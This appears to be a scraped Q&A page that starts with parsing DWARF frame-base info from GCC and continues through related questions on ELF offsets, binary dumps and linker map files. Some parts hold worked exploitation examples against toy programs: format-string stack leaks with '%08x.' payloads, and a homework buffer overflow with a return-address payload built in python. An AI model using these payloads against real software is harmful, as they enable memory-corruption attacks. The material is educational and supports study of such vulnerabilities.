How to parse DW_OP_call_frame_cfa? - c

I am trying to get the variables location from a C (x86_64) code using libdwarf, but GCC even with optimizations off (-O0) generates the frame base relative from DW_OP_call_frame_cfa. In turn, clang uses DW_OP_reg6, which points to rbp in x86_64 ABI.
I have read the DWARF-4 Standard but I can not figure out how to get the actual address, relative from the stack or base pointer. I also encountered a similar question What do I do with DW_OP_call_frame_cfa here, but without success.
A simple code like:
int main()
{
int va = 1;
int vb = 2;
va = va + vb;
return (va);
}
will produce the following output in dwarfdump:
< 1><0x0000002d> DW_TAG_subprogram
DW_AT_external yes(1)
DW_AT_name main
DW_AT_decl_file 0x00000001 file.c
DW_AT_decl_line 0x00000001
DW_AT_type <0x00000069>
DW_AT_low_pc 0x00400620
DW_AT_high_pc <offset-from-lowpc>29
DW_AT_frame_base len 0x0001: 9c: DW_OP_call_frame_cfa
DW_AT_GNU_all_call_sites yes(1)
DW_AT_sibling <0x00000069>
< 2><0x0000004e> DW_TAG_variable
DW_AT_name va
DW_AT_decl_file 0x00000001 file.c
DW_AT_decl_line 0x00000003
DW_AT_type <0x00000069>
DW_AT_location len 0x0002: 916c: DW_OP_fbreg -20
< 2><0x0000005b> DW_TAG_variable
DW_AT_name vb
DW_AT_decl_file 0x00000001 file.c
DW_AT_decl_line 0x00000004
DW_AT_type <0x00000069>
DW_AT_location len 0x0002: 9168: DW_OP_fbreg -24
and the following information in readelf -wf file
00000070 000000000000001c 00000044 FDE cie=00000030 pc=0000000000400620..000000000040063d
DW_CFA_advance_loc: 1 to 0000000000400621
DW_CFA_def_cfa_offset: 16
DW_CFA_offset: r6 (rbp) at cfa-16
DW_CFA_advance_loc: 3 to 0000000000400624
DW_CFA_def_cfa_register: r6 (rbp)
DW_CFA_advance_loc: 24 to 000000000040063c
DW_CFA_def_cfa: r7 (rsp) ofs 8
DW_CFA_nop
DW_CFA_nop
DW_CFA_nop
from what I read, I have to implement a minimal stack machine, but I do not even know how to parse this manually.
Is there a way to force GCC to not use the DW_OP_call_frame_cfa and use a simple register or do I really need to interpret the frame information? and if so, how?

I am not really familiar with DWARF or debug info formats in general, but to aswer just the
Is there a way to force GCC to not use the DW_OP_call_frame_cfa
part, I've found out from grepping for DW_OP_call_frame_cfa in GCC sources that the -gdwarf-2 gcc switch makes it produce this instead:
DW_AT_frame_base <loclist at offset 0x00000000 with 4 entries follows>
[ 0]< offset pair low-off : 0x00000000 addr 0x00001119 high-off 0x00000001 addr 0x0000111a>DW_OP_breg7+8
[ 1]< offset pair low-off : 0x00000001 addr 0x0000111a high-off 0x00000004 addr 0x0000111d>DW_OP_breg7+16
[ 2]< offset pair low-off : 0x00000004 addr 0x0000111d high-off 0x0000001c addr 0x00001135>DW_OP_breg6+16
[ 3]< offset pair low-off : 0x0000001c addr 0x00001135 high-off 0x0000001d addr 0x00001136>DW_OP_breg7+8
Not sure whether switching to version 2 of DWARF suits you though.

Related

Where in object file does the code of function "main" starts?

I have an object file of a C program which prints hello world, just for the question.
I am trying to understand using readelf utility or gdb or hexedit(I can't figure which tool is a correct one) where in the file does the code of function "main" starts.
I know using readelf that symbol _start & main occurs and the address where it is mapped in a virtual memory. Moreover, I also know what the size of .text section and the of coruse where entry point specified, i.e the address which the same of text section.
The question is - Where in the file does the code of function "main" starts? I tought that is the entry point and the offset of the text section but how I understand it the sections data, bss, rodata should be ran before main and it appears after section text in readelf.
Also I tought we should sum the size all the lines till main in symbol table, but I am not sure at all if it is correct.
Additional question which follow up this one is if I want to replace main function with NOP instrcutres or plant one ret instruction in my object file. how can I know the offset where I can do it using hexedit.
So, let's go through it step by step.
Start with this C file:
#include <stdio.h>
void printit()
{
puts("Hello world!");
}
int main(void)
{
printit();
return 0;
}
As the comments look like you are on x86, compile it as 32-bit non-PIE executable like this:
$ gcc -m32 -no-pie -o test test.c
The -m32 option is needed, because I am working at a x86-64 machine. As you already know, you can get the virtual memory address of main using readelf, objdump or nm, for example like this:
$ nm test | grep -w main
0804918d T main
Obviously, 804918d can not be an offset in the file that is just 15 kB big. You need to find the mapping between virtual memory addresses and file offsets. In a typical ELF file, the mapping is included twice. Once in a detailed form for linkers (as object files are also ELF files) and debuggers, and a second time in a condensed form that is used by the kernel for loading programs. The detailed form is the list of sections, consisting of section headers, and you can view it like this (the output is shortened a bit, to make the answer more readable):
$ readelf --section-headers test
There are 29 section headers, starting at offset 0x3748:
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
[...]
[11] .init PROGBITS 08049000 001000 000020 00 AX 0 0 4
[12] .plt PROGBITS 08049020 001020 000030 04 AX 0 0 16
[13] .text PROGBITS 08049050 001050 0001c1 00 AX 0 0 16
[14] .fini PROGBITS 08049214 001214 000014 00 AX 0 0 4
[15] .rodata PROGBITS 0804a000 002000 000015 00 A 0 0 4
[...]
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
p (processor specific)
Here you find that the .text section starts at (virtual) address 08049050 and has a size of 1c1 bytes, so it ends at address 08049211. The address of main, 804918d is in this range, so you know main is a member of the text section. If you subtract the base of the text section from the address of main, you find that main is 13d bytes into the text section. The section listing also contains the file offset where the data for the text section starts. It's 1050, so the first byte of main is at offset 0x1050 + 0x13d == 0x118d.
You can do the same calculation using program headers:
$ readelf --program-headers test
[...]
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x00160 0x00160 R 0x4
INTERP 0x000194 0x08048194 0x08048194 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x002e8 0x002e8 R 0x1000
LOAD 0x001000 0x08049000 0x08049000 0x00228 0x00228 R E 0x1000
LOAD 0x002000 0x0804a000 0x0804a000 0x0019c 0x0019c R 0x1000
LOAD 0x002f0c 0x0804bf0c 0x0804bf0c 0x00110 0x00114 RW 0x1000
[...]
The second load line tells you that the area 08049000 (VirtAddr) to 08049228 (VirtAddr + MemSiz) is readable and executable, and loaded from offset 1000 in the file. So again you can calculate that the address of main is 18d bytes into this load area, so it has to reside at offset 0x118d inside the executable. Let's test that:
$ ./test
Hello world!
$ echo -ne '\xc3' | dd of=test conv=notrunc bs=1 count=1 seek=$((0x118d))
1+0 records in
1+0 records out
1 byte copied, 0.0116672 s, 0.1 kB/s
$ ./test
$
Overwriting the first byte of main with 0xc3, the opcode for return (near) on x86, causes the program to not output anything anymore.
_start normally belongs to a module ( a *.o file) that is fixed (it is called differently on different systems, but a common name is crt0.o which is written in assembler.) That fixed code prepares the stack (normally the arguments and the environment are stored in the initial stack segment by the execve(2) system call) the mission of crt0.s is to prepare the initial C stack frame and call main(). Once main() ends, it is responsible of getting the return value from main and calling all the atexit() handlers to finish calling the _exit(2) system call.
The linking of crt0.o is normally transparent due to the fact that you always call the compiler to do the linking itself, so you normally don't have to add crt0.o as the first object module, but the compiler knows (lately, all this stuff has grown considerably, since we depend on architecture and ABIs to pass parameters between functions)
If you execute the compiler with the -v option, you'll get the exact command line it uses to call the linker and you'll get the secrets of the final memory map your program has on its first stages.

Difficulties Understanding Format String Exploitation

I am reading a book, Hacking: The Art of Exploitation 2nd Edition, and I'm at the chapter of format string vulnerability. I read the chapter multiple times but I'm unable to clearly understand it, even with some googling.
So, in the book there is this vulnerable code:
char text[1024];
...
strcpy(text, argv[1]);
printf("The right way to print user-controlled input:\n");
printf("%s", text);
printf("\nThe wrong way to print user-controlled input:\n");
printf(text);
Then after compiling,
reader#hacking:~/booksrc $ ./fmt_vuln $(perl -e 'print "%08x."x40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
%08x.%08x.
The wrong way to print user-controlled input:
bffff320.b7fe75fc.00000000.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252
e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.2
52e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e78
38.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
The bytes 0x25, 0x30, 0x38, 0x78, and 0x2e seem to be repeating a lot.
reader#hacking:~/booksrc $ printf "\x25\x30\x38\x78\x2e\n"
%08x.
First, why is that value repeating itself?
As you can see, they’re the memory for the format string itself. Because
the format function will always be on the highest stack frame, as long as the
format string has been stored anywhere on the stack, it will be located below
the current frame pointer (at a higher memory address).
But it seems to me this contradicts what he previously wrote and the way stack frames are organized
When this printf() function is called (as with any function), the arguments are pushed to the stack in reverse order.
So, shouldn't the format string be at a lower memory address since it is the first argument? And where is the format string stored?
reader#hacking:~/booksrc $ ./fmt_vuln AAAA%08x.%08x.%08x.%08x
The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAAbffff3d0.b7fe75fc.00000000.41414141
Here again, why is AAAA repeated in 41414141. From what I understand, the printf function prints AAAA first, then when it sees the first %08x, it gets a value from a memory address in the preceding stack frame, then does the same with the second %08x, thus the value of the second is located in a memory address higher than the first one, and finally returns to the value of AAAA located in a lower memory address, in the stack frame of printf function.
I debugged the first example with $(perl -e 'print "%08x."x40') as argument. I run: Linux 5.3.0-40-generic, 18.04.1-Ubuntu, x86_64
(gdb) run $(perl -e 'print "%08x." x 40')
Starting program: /home/kuro/fmt_vuln $(perl -e 'print "%08x." x 40')
The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
07a51260.4b3eb8c0.4b10e154.00000000.4b16c3a0.9d357fc8.9d357b10.78383025.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838.4b618d00.4b5fd000.00000000.9d357c80.00000000.00000000.00000000.4b3ef6f0.
Breakpoint 1, main (argc=2, argv=0x7ffd9d357fc8) at fmt_vuln.c:19
19 printf("[*] test_val # 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
(gdb) x/-100xw $rsp
0x7ffd9d357940: 0x00000400 0x00000000 0x4b07c1aa 0x00007fb8
0x7ffd9d357950: 0x00000016 0x00000000 0x00000003 0x00000000
0x7ffd9d357960: 0x00000001 0x00000000 0x00002190 0x000003e8
0x7ffd9d357970: 0x00000005 0x00000000 0x00008800 0x00000000
0x7ffd9d357980: 0x00000000 0x00000000 0x00000400 0x00000000
0x7ffd9d357990: 0x00000000 0x00000000 0x5e970730 0x00000000
0x7ffd9d3579a0: 0x65336234 0x30663666 0x90890300 0x79e57be9
0x7ffd9d3579b0: 0x1cd79dbf 0x00000000 0x00000000 0x00000000
0x7ffd9d3579c0: 0x05cec660 0x000055ef 0x9d357fc0 0x00007ffd
0x7ffd9d3579d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffd9d3579e0: 0x9d357ee0 0x00007ffd 0x4b062f26 0x00007fb8
0x7ffd9d3579f0: 0x00000030 0x00000030 0x9d357be8 0x00007ffd
0x7ffd9d357a00: 0x9d357a10 0x00007ffd 0x90890300 0x79e57be9
0x7ffd9d357a10: 0x4b3ea760 0x00007fb8 0x07a51260 0x000055ef
0x7ffd9d357a20: 0x4b3eb8c0 0x00007fb8 0x4b0891bd 0x00007fb8
0x7ffd9d357a30: 0x00000000 0x00000000 0x4b3ea760 0x00007fb8
0x7ffd9d357a40: 0x00000d68 0x00000000 0x00000169 0x00000000
0x7ffd9d357a50: 0x07a51260 0x000055ef 0x4b08af51 0x00007fb8
0x7ffd9d357a60: 0x4b3e62a0 0x00007fb8 0x4b3ea760 0x00007fb8
0x7ffd9d357a70: 0x0000000a 0x00000000 0x05cec660 0x000055ef
0x7ffd9d357a80: 0x9d357fc0 0x00007ffd 0x00000000 0x00000000
0x7ffd9d357a90: 0x00000000 0x00000000 0x4b08b403 0x00007fb8
0x7ffd9d357aa0: 0x4b3ea760 0x00007fb8 0x9d357ee0 0x00007ffd
0x7ffd9d357ab0: 0x05cec660 0x000055ef 0x4b0808f5 0x00007fb8
0x7ffd9d357ac0: 0x00000000 0x00000000 0x05cec824 0x000055ef
(gdb) x/100xw $rsp
0x7ffd9d357ad0: 0x9d357fc8 0x00007ffd 0x9d357b10 0x00000002
0x7ffd9d357ae0: 0x78383025 0x3830252e 0x30252e78 0x252e7838
0x7ffd9d357af0: 0x2e783830 0x78383025 0x3830252e 0x30252e78
0x7ffd9d357b00: 0x252e7838 0x2e783830 0x78383025 0x3830252e
0x7ffd9d357b10: 0x30252e78 0x252e7838 0x2e783830 0x78383025
0x7ffd9d357b20: 0x3830252e 0x30252e78 0x252e7838 0x2e783830
0x7ffd9d357b30: 0x78383025 0x3830252e 0x30252e78 0x252e7838
0x7ffd9d357b40: 0x2e783830 0x78383025 0x3830252e 0x30252e78
0x7ffd9d357b50: 0x252e7838 0x2e783830 0x78383025 0x3830252e
0x7ffd9d357b60: 0x30252e78 0x252e7838 0x2e783830 0x78383025
0x7ffd9d357b70: 0x3830252e 0x30252e78 0x252e7838 0x2e783830
0x7ffd9d357b80: 0x78383025 0x3830252e 0x30252e78 0x252e7838
0x7ffd9d357b90: 0x2e783830 0x78383025 0x3830252e 0x30252e78
0x7ffd9d357ba0: 0x252e7838 0x2e783830 0x4b618d00 0x00007fb8
0x7ffd9d357bb0: 0x4b5fd000 0x00007fb8 0x00000000 0x00000000
0x7ffd9d357bc0: 0x9d357c80 0x00007ffd 0x00000000 0x00000000
0x7ffd9d357bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7ffd9d357be0: 0x4b3ef6f0 0x00007fb8 0x4b6184c8 0x00007fb8
0x7ffd9d357bf0: 0x9d357c80 0x00007ffd 0x4b3ef000 0x00007fb8
0x7ffd9d357c00: 0x4b3ef914 0x00007fb8 0x4b3ef3c0 0x00007fb8
0x7ffd9d357c10: 0x4b617048 0x00007fb8 0x00000000 0x00000000
0x7ffd9d357c20: 0x00000000 0x00000000 0x4b6179f0 0x00007fb8
0x7ffd9d357c30: 0x4b0030e8 0x00007fb8 0x00000000 0x00000000
0x7ffd9d357c40: 0x4b3efa00 0x00007fb8 0x00000480 0x00000000
0x7ffd9d357c50: 0x00000027 0x00000000 0x00000000 0x00000000
The values, that appear before "%08x." in the Wrong way output, appear in lower addresses than "%08x." values. Why? The format string is supposed to be at the top of the stack.
The values, that appear after the "%08x." values in the Wrong way output, appear in higher addresses than"%08x." values. So in the preceding stack.
Why is it like this? Shouldn't the output begin from the format string values, or after?
Also, in the book, it doesn't print values after "%08x." values. But some are printed in my case. And some values in the output don't even figure in the stack, like 4b16c3a0.
I have to recommend against what you're doing. You're focussing on security vulnerabilities in C without a strong understanding of the language itself. That's an exercise in frustration. As evidence, I offer that every question you're posing about the exercise is answered by understanding printf(3), not stack vulnerabilities.
The output of your perl line (the contents of argv[1]) starts with, %08x.%08x.%08x.%08x.%08x. Thats a format string. Each %08x is looking for a further printf argument, an integer to print in hex representation. Normally, you might do something like,
int a = 'B';
printf( "%02x\n", a );
which produces 42 much faster than the computer in the Hitchhiker's Guide to the Galaxy.
What you've done is pass a long format string with zero arguments. printf(3) can't know how many arguments it was passed; it has to infer them from the format string. Your format string tells printf to print a long list of integers. Since none were provided, it looks for them "up the stack" (wherever they should have been). You print nonsense because the contents of those memory locations is unpredictable. Or, at any rate, weren't defined by you.
In the "good" case, the format string is "%s", declaring one argument of type string, which you provided. That works much better, yes.
Most compilers nowadays take special care with printf. They can produce warnings if the format string isn't a compile-time constant, and they can verify that each argument is of the correct type for its corresponding format specifier. The whole chapter in your book can thus be made moot simply by using the compiler's capabilities and paying attention to its diagnostics.

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.
First, you need to find the offset to overwrite the Instruction pointer register (EIP).
Use gdb + peda is very useful:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu#debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu#debian /tmp]$ ./bof < input
Gotcha!

Understanding GCC generated map files

I'm trying to write a script that parses .map files generated by GCC and help me figure out what the footprints of various libraries are in memory. (Github repository of what I have so far)
I'm trying to understand what the following means / how it should be read :
.debug_line 0x00000000 0x67b1
*(.debug_line .debug_line.* .debug_line_end)
.debug_line 0x00000000 0x105 /opt/ti/gcc/bin/../lib/gcc/msp430-elf/4.9.1/../../../../msp430-elf/lib/crt0.o
.debug_line 0x00000105 0x4b5 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
.debug_line.text.bc_printf.constprop.1
0x000005ba 0x23 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
.debug_line.text.deferred_exec
0x000005dd 0x60 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
.debug_line.text.startup.main
0x0000063d 0xfc CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
.debug_line_end
0x00000739 0x0 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
I've been assuming the first line, which is not indented, is some sort of section heading and that the address (0x0000000) somehow relates to where the contents of the section should be written. 0x00000000 somehow results in the contents being discarded.
The indented lines (those which start with .debug_line) also have an address. These addresses, when the symbol is going to be written to the binary, are absolute.
.text 0x000048d8 0x3312
0x000048d8 . = ALIGN (0x2)
*(.lower.text.* .lower.text)
0x000048d8 . = ALIGN (0x2)
*(.text .stub .text.* .gnu.linkonce.t.* .text:*)
.text 0x000048d8 0xa4 /opt/ti/gcc/bin/../lib/gcc/msp430-elf/4.9.1/crtbegin.o
.text.bc_printf.constprop.1
0x0000497c 0x1a CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
How does the address in the section heading, or whatever the first line should be called, translate to the address in the actual symbols and so forth? i.e., How would 0x00000000 result in the symbols being discarded (even though the addresses they contain may indeed be valid writeable locations otherwise)
What does the indented line beginning with a *, i.e. *(.debug_line .debug_line.* .debug_line_end) mean? I'm fairly certain this line is critical to defining the treatment of the second last line in the first snippet, since .debug_line_end isn't defined all by itself in a way similar to how .debug_line is in the first line of the snippet. I can't seem to find any references to the structure of the file, though.
With those answers, I'd like to be able to understand how .eh_frame in the following snippet is resolved. I can post the full map file if it's necessary, but I suspect all the information needed is somehow encoded within the snippet, and at that within the top and bottom few lines only.
.rodata 0x00004400 0x464
0x00004400 . = ALIGN (0x2)
*(.plt)
0x00004400 . = ALIGN (0x2)
*(.lower.rodata.* .lower.rodata)
0x00004400 . = ALIGN (0x2)
*(.rodata .rodata.* .gnu.linkonce.r.* .const .const:*)
.rodata 0x00004400 0x11 CMakeFiles/firmware-msp430f5529.elf.dir/main.c.obj
*fill* 0x00004411 0x1
.rodata.tUsbRequestList
0x00004412 0x15c ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x00004412 tUsbRequestList
.rodata.stUsbHandle
0x0000456e 0x40 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x0000456e stUsbHandle
.rodata.report_desc_HID0
0x000045ae 0x24 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x000045ae report_desc_HID0
.rodata.abromStringDescriptor
0x000045d2 0x146 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x000045d2 abromStringDescriptor
.rodata.abromConfigurationDescriptorGroup
0x00004718 0xef ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x00004718 abromConfigurationDescriptorGroup
.rodata.abromDeviceDescriptor
0x00004807 0x12 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x00004807 abromDeviceDescriptor
*fill* 0x00004819 0x1
.rodata.report_desc_size
0x0000481a 0x2 ../peripherals/USB_config/libusb-config-msp430f5529.a(descriptors.c.obj)
0x0000481a report_desc_size
.rodata 0x0000481c 0x11 ../subsystem/libcontrol-iface-msp430f5529.a(control_iface.c.obj)
*fill* 0x0000482d 0x1
.rodata.GPIO_PORT_TO_BASE
0x0000482e 0x1c ../peripherals/driverlib/MSP430F5xx_6xx/libdriverlib-msp430f5529.a(gpio.c.obj)
.rodata 0x0000484a 0x7 ../lib/libprintf-msp430f5529.a(printf.c.obj)
*(.rodata1)
*(.eh_frame_hdr)
*(.eh_frame)
*fill* 0x00004851 0x3
.eh_frame 0x00004854 0x0 /opt/ti/gcc/bin/../lib/gcc/msp430-elf/4.9.1/crtbegin.o

Interesting binary dump of executable file

For some reason I made simple program in C to output binary representation of given input:
int main()
{
char c;
while(read(0,&c,1) > 0)
{
unsigned char cmp = 128;
while(cmp)
{
if(c & cmp)
write(1,"1",1);
else
write(1,"0",1);
cmp >>= 1;
}
}
return 0;
}
After compilation:
$ gcc bindump.c -o bindump
I made simple test to check if program is able to print binary:
$ cat bindump | ./bindump | fold -b100 | nl
Output is following: http://pastebin.com/u7SasKDJ
I suspected the output to look like random series of ones and zeroes. However, output partially seems to be quite more interesting. For example take a look at the output between line 171 and 357. I wonder why there are lots of zeros in compare to other sections of executable ?
My architecture is:
$ lscpu
Architecture: i686
CPU op-mode(s): 32-bit, 64-bit
Byte Order: Little Endian
CPU(s): 4
On-line CPU(s) list: 0-3
Thread(s) per core: 2
Core(s) per socket: 2
Socket(s): 1
Vendor ID: GenuineIntel
CPU family: 6
Model: 28
Stepping: 10
CPU MHz: 1000.000
BogoMIPS: 3325.21
Virtualization: VT-x
L1d cache: 24K
L1i cache: 32K
L2 cache: 512K
When you compile a program into an executable on Linux (and a number of other unix systems), it is written in the ELF format. The ELF format has a number of sections, which you can examine with readelf or objdump:
readelf -a bindump | less
For example, section .text contains CPU instructions, .data global variables, .bss uninitialized global variables (it is actually empty in the ELF file itself, but is created in the main memory when the program is executed), .plt and .got which are jump tables, debugging information, etc.
Btw. it is much more convenient to examine the binary content of files with hexdump:
hexdump -C bindata | less
There you can see that starting with offset 0x850 (approx. line 171 in your dump) there is a lot of zeros, and you can also see the ASCII representation on the right.
Let us look at which sections correspond to the block of your interest between 0x850 and 0x1160 (the field Off – offset in the file is important here):
> readelf -a bindata
...
Section Headers:
[Nr] Name Type Addr Off Size ES Flg Lk Inf Al
...
[28] .shstrtab STRTAB 00000000 00074c 000106 00 0 0 1
[29] .symtab SYMTAB 00000000 000d2c 000440 10 30 45 4
...
You can examine the content of an individual section with -x:
> readelf -x .symtab bindump | less
0x00000000 00000000 00000000 00000000 00000000 ................
0x00000010 00000000 34810408 00000000 03000100 ....4...........
0x00000020 00000000 48810408 00000000 03000200 ....H...........
0x00000030 00000000 68810408 00000000 03000300 ....h...........
0x00000040 00000000 8c810408 00000000 03000400 ................
0x00000050 00000000 b8810408 00000000 03000500 ................
0x00000060 00000000 d8810408 00000000 03000600 ................
You would see that there are many zeros. The section is composed of 18-byte values (= one line in the -x output) defining symbols. From readelf -a you can see that it has 68 entries, and first 27 of them (excl. the very first one) are of type SECTION:
Symbol table '.symtab' contains 68 entries:
Num: Value Size Type Bind Vis Ndx Name
0: 00000000 0 NOTYPE LOCAL DEFAULT UND
1: 08048134 0 SECTION LOCAL DEFAULT 1
2: 08048148 0 SECTION LOCAL DEFAULT 2
3: 08048168 0 SECTION LOCAL DEFAULT 3
4: 0804818c 0 SECTION LOCAL DEFAULT 4
...
According to the specification (page 1-18), each entry has the following format:
typedef struct {
Elf32_Word st_name;
Elf32_Addr st_value;
Elf32_Word st_size;
unsigned char st_info;
unsigned char st_other;
Elf32_Half st_shndx;
} Elf32_Sym;
Without going into too much detail here, I think what matters here is that st_name and st_size are both zeros for these SECTION entries. Both are 32-bit numbers, which means lots of zeros in this particular section.
This is not really a programming question, but however...
A binary normally consists of different sections: code, data, debugging info, etc. Since these sections contents differ by type, I would pretty much expect them to look different.
I.e. the symbol table consists of address offsets in your binary. If I read your lspci correctly, you are on a 32-bit system. That means Each offset has four bytes, and given the size of your program, in most cases two of those bytes will be zero. And there are more effects like this.
You didn't strip your program, that means there's still lots of information (symbol table etc.) present in the binary. Try stripping the binary and have a look at it again.

Resources